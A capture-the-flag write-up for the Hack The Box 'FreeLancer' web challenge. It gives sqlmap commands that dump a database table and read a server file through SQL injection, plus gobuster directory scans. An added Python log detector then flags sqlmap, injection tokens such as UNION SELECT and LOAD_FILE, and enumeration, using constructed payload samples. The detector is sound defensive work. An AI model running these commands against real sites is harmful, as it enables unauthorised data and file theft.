FreeLancer
HTB WEB CHALLENGE
- CTF Name: FreeLancer
- Resource: Hack The Box CTF
- Difficulty: [30 pts] medium range
Hint: Can you test how secure my website is? Prove me wrong and capture the flag!
Tips: Always check the source code when nothing on the page looks suspicious.
From the source code we found portfolio.php?id=3
Step2:
SQL injection using sqlmap:
sqlmap -u "http://docker.hackthebox.eu:30596/portfolio.php?id=3" --dbs
We see a database named freelancer.
sqlmap -u "http://docker.hackthebox.eu:30596/portfolio.php?id=3" --tables
We see a table called safeadmin.
sqlmap -u "http://docker.hackthebox.eu:30596/portfolio.php?id=3" -T safeadmin --dump
You will find a hash, but it is uncrackable.
Step3:
Try Gobuster
gobuster dir -u "ip/" -w /usr/share/dir/wordlists/common.txt
We found /administrat, which returns a 301.
A login page is displayed, but nothing else was found.
Step4:
Try Dirbuster or gobuster with ip/administrat
Found /panel.php and /index.php
/panel.php redirects to index.php
Step5:
Let's check out the page. I know that the standard web directory is something like /var/www/html, and that it holds the files and pages.
Try sqlmap again:
sqlmap -u "ip/administrat/panel.php" --file-read=/var/www/html/administrat/panel.php
then cat that file
Step6:
cat the above file; you will get the FLAG
Learned:
This CTF taught me about using sqlmap for more than just SQL injection.
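Seen from the defender's side, the sqlmap and gobuster steps above leave a recognisable trail in the web server's access log. The following is an added example, not part of the original write-up: a small detector that assumes Apache combined-format logs and a numeric id parameter, with constructed sample lines; the function names, finding names and threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format (an assumption; the write-up shows no logs).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
# Tokens that never belong in a numeric id; LOAD_FILE( is how MySQL reads files via SQL.
SQL_TOKENS = re.compile(r"union\s+select|load_file\s*\(|sleep\s*\(|information_schema", re.I)

def analyse(lines, enum_threshold=5):
    """Return {client_ip: set of finding names} for access-log lines."""
    findings, not_found = defaultdict(set), defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, url = m["ip"], urlsplit(m["target"])
        if "sqlmap" in m["ua"].lower():          # default sqlmap User-Agent
            findings[ip].add("sqlmap-user-agent")
        # parse_qs URL-decodes, so encoded payloads are inspected in clear text
        for value in parse_qs(url.query).get("id", []):
            if not value.isdigit():
                findings[ip].add("non-numeric-id")
            if SQL_TOKENS.search(value):
                findings[ip].add("sql-keywords-in-id")
        if m["status"] == "404":
            not_found[ip].add(url.path)
    for ip, paths in not_found.items():          # wordlist scans miss far more than they hit
        if len(paths) >= enum_threshold:
            findings[ip].add("directory-enumeration")
    return dict(findings)

def log_line(ip, target, status, ua):
    """Build one constructed combined-format line for the demo."""
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {target} HTTP/1.1" {status} 512 "-" "{ua}"'

# Constructed sample traffic (documentation IP ranges), not real captures.
SAMPLE = [
    log_line("203.0.113.7", "/portfolio.php?id=3", 200, "Mozilla/5.0"),
    log_line("198.51.100.9", "/portfolio.php?id=3%20UNION%20SELECT%20NULL--%20-", 200, "sqlmap/1.x"),
    log_line("198.51.100.9", "/portfolio.php?id=3%20AND%201%3D1", 200, "curl/8.0"),
] + [log_line("198.51.100.23", f"/{p}", 404, "gobuster/3.x")
     for p in ("admin", "backup", "cgi-bin", "config", "login", "test")] + [
    log_line("198.51.100.23", "/administrat", 301, "gobuster/3.x")]

if __name__ == "__main__":
    for ip, names in sorted(analyse(SAMPLE).items()):
        print(ip, sorted(names))
```

The User-Agent check is the weakest signal because the header is client-controlled; the non-numeric id check still fires when it has been changed.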